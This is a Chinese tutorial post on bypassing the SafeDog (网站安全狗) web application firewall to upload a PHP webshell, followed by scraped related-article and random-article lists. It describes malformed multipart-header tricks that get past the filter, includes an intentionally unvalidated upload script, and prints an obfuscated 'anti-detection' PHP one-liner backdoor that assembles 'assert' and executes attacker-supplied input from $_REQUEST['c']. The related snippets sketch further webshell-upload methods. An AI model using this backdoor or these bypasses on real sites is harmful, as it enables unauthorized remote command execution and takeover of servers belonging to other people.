这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法。

思路是：修改HTTP请求，构成畸形HTTP请求，然后绕过网站安全狗的检测。

废话不多说，切入正题。。。。

1、实验环境：

Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.12048

2、用于文件上传的PHP源码：

<?php

$path = dirname(__FILE__) . '/upload/';

$rand = rand(0,30);

move_uploaded_file($_FILES["file"]["tmp_name"],$path . $rand . $_FILES["file"]["name"]);

echo "File Path:" . $path . $rand . $_FILES["file"]["name"] . "<br/>";

echo "OK";

?>

因为此次实验的目的是绕过网站安全狗，所以PHP源码上我没做任何检测，把上传的文件直接放在upload目录下。

3、先看一下正常的HTTP请求：

很明显，文件名为”yijuhua.php”被拦截。。。。

4、尝试%00截断：

很明显，失败了。。。

5、修改HTTP请求，构造畸形HTTP请求

(1)删除实体里面的Conten-Type字段：

绕过网站安全狗的拦截，成功上传WebShell。。。

(2)删除Content-Disposition字段里的空格：

(3)修改Content-Disposition字段值的大小写：

6、菜刀连接一句话：

到此，上传WebShell结束，各位看明白了吗？

7、免杀PHP一句话：

<?php

/*

PHP一句话木马

assert($string)

*/

$arr = array('a','s','s','e','r','t');

$func = '';

for($i=0;$i<count($arr);$i++) {

$func .= $func . $arr[$i];

}

$func($_REQUEST['c']);

?>

8、修复漏洞：

出现这种情况，我认为是网站安全狗在开发时没有考虑到畸形HTTP请求，而Apache却兼容畸形HTTP请求，所以能够上传成功。

绕过网站安全狗拦截，上传Webshell技巧总结（附免杀PHP一句话）的更多相关文章

1. 高版本正方教务系统上传后缀过滤不严导致能直接上传Webshell

   在旧版本中有一个利用插件上传文件的漏洞,但是在新版本中已经没有了这个插件.这个漏洞是由于过滤不严造成的,可以直接上传Webshell进行提权,由于代码在DLL中,全国大部分高校均有此漏洞,影响范围很大 ...

2. 如何上传webshell后改回原来的webshell的格式

   一般后台不给允许上传php,asp格式的东东 所以我们要把木马改为jpg格式 记录下上传的路径 我们上传后木马因为格式不对不能被正确解析,我们可以利用网站的备份数据库模式恢复格式 在备份数据库那填上我 ...

3. burpsuite截断上传webshell

   1.先设置好代理127.0.0.1 8080 2.开启截断模式 3.上传文件会被burp截断 4.在hex下找到你上传的webshell的16进制编码 5.把.后面的源码改为00 点击forward上 ...

4. 基于SpringBoot从零构建博客网站 - 设计可扩展上传模块和开发修改头像密码功能

   上传模块在web开发中是很常见的功能也是很重要的功能,在web应用中需要上传的可以是图片.pdf.压缩包等其它类型的文件,同时对于图片可能需要回显,对于其它文件要能够支持下载等.在守望博客系统中对于上 ...

5. 基于Flask开发网站 -- 前端Ajax异步上传文件到后台

   大家好,我是辰哥~ 辰哥最近利用空闲时间在写一个在线可视化平台,过程中也觉得一些技术还是比较有意思的,所以就以模块化的形式分享出来.如:从网页界面(前端)上传文件到服务器(后端). 放一下该模块的界面 ...

6. 文件上传小技巧&sol;后端处理【以php示例】

   引语:在上一篇文章中说到,在页面中可以用隐藏的方式让你的上传页面看起来漂亮.但是这对于性能来说,并没有什么卵用,那么在后台的处理中,难道就没有一些处理技巧么?所谓后台的技巧,应该要包括上传得快一点,上 ...

7. 文件上传小技巧&sol;原生态【html篇】

   引语:大家都知道,html中上传文件就一个input,type=file就搞定了.但是,这个标签的样式,实在不值得提点什么,要改动他的样式,恐怕也是较难的.但是其实挺简单,今天就来说说上传文件小技巧吧 ...

8. php文件上传与下载（附封装好的函数文件）

   单文件上传前端页面 <!DOCTYPE html> <html lang="en"> <head> <meta charset=&quot ...

9. git上传代码技巧

   1.一定要先在git上面创建项目然后把文件拉到本地先 1.1克隆到本地(orgin=>'你的远程仓库地址') git clone orgin 1.2初始化项目文件夹 git init 2.操作之 ...

随机推荐

1. MyEclipse------File类的各种方法

   usingFile.jsp <%@ page language="java" import="java.util.*" pageEncoding=&quo ...

2. ThinkPHP讲解（八）——显示、修改、添加、删除

   一.显示数据 <h1>主页面</h1> <table width="100%" border="1" cellpadding=&q ...

3. uva 11107 Life Forms

   题意:给你N个串,求一个串在大于等于N/2的模板串中连续出现.如果有多解按字典序最小输出. 白书模板题.二分答案+合并模板串成一个新串,扫秒新串的height数组. 考查后缀数组+LCP #inclu ...

4. nginx一致性hash及应用场景。

   考虑一种场景. 多台web服务. 1 后台添加用户,更新用户信息,要求管理员能够实时看到变化. 2 前台用户允许1分钟后生效. nginx 配置一致性hash1. https://github.com ...

5. bzoj4160&colon; &lbrack;Neerc2009&rsqb;Exclusive Access 2

   Description 给出 N 个点M 条边的无向图,定向得到有向无环图,使得最长路最短. N ≤ 15, M ≤ 100 Input 第一行一个数M (1≤M≤100). 接下来M行,每行两个大写 ...

6. IT人大学生活之&OpenCurlyDoubleQuote;做点正经事”

   最近一直主抓部门的人事招聘工作:很多到手的简历,特别是毕业一年之内的同学的简历上面都会写到:在xxx餐饮公司实习,获得了与人交流的经验:在学生会组织了哪些文体活动:在大四参加了一些与软件开发不相关的一 ...

7. beamer中插入c代码，python代码的经验

   下面是插入的scala代码,它与python在某些语法上类似,所在在https://github.com/olivierverdier/python-latex-highlighting下载了一个py ...

8. 彻底理解 Android 中的阴影

   如果我们想创造更好的 Android App,我相信我们需要遵循 Material Design 的设计规范.一般而言,Material Design 是一个包含光线,材质和投影的三维环境.如果我们想 ...

9. JavaScript初探之字符串与数组

   一直在研究JS以至于忘记跟新博客... 字符串:// str.charAt(x); //获取下标为x的字符// str.indexOf(",",1); //获取",&qu ...

10. Scrapy爬虫框架第八讲【项目实战篇：知乎用户信息抓取】--本文参考静觅博主所写

    思路分析: (1)选定起始人(即选择关注数和粉丝数较多的人--大V) (2)获取该大V的个人信息 (3)获取关注列表用户信息 (4)获取粉丝列表用户信息 (5)重复(2)(3)(4)步实现全知乎用户爬 ...